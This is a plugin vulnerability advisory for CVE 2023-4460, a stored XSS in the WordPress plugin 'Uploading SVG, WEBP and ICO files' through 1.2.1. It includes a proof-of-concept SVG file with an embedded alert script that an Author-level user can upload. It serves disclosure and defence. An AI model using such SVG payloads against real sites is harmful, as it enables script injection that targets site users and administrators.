Uploading SVG, WEBP and ICO files <= 1.2.1 – Author+ Stored XSS via SVG | CVE 2023-4460 | Plugin Vulnerabilities

Description

The plugin does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.

Proof of Concept

As an author, upload an SVG file with malicious JavaScript:

```
<svg xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#089900" stroke= "#004400"/>
<script type="text/javascript">alert("pwned by daniloalbugrque");</script>
</svg>
```

Access the file through its URL to see XSS.

Affects Plugins

uploading-svgwebp-and-ico-files

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Danilo Albuquerque

Submitter

Danilo Albuquerque

Submitter website

https://github.com/daniloalbuqrque

Verified

Yes

WPVDB ID

82f8d425-449a-471f-94df-8439924fd628

Timeline

Publicly Published

2023-11-13 (about 2 years ago)

Added

2023-11-13 (about 2 years ago)

Last Updated

2023-11-13 (about 2 years ago)

Other

Published

Title

Published

2024-03-25

Title

WP User Profile Avatar < 1.0.2 - Contributor+ Stored XSS

Published

2022-12-21

Title

WCK < 2.3.3 - Admin+ Stored XSS

Published

2024-03-18

Title

Tourfic < 2.11.9 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2023-03-16

Title

Mortgage Calculator Estatik <= 2.0.12 - Reflected XSS

Published

2020-03-18

Title

Advanced Ads < 1.17.4 - Reflected XSS via Admin Dashboard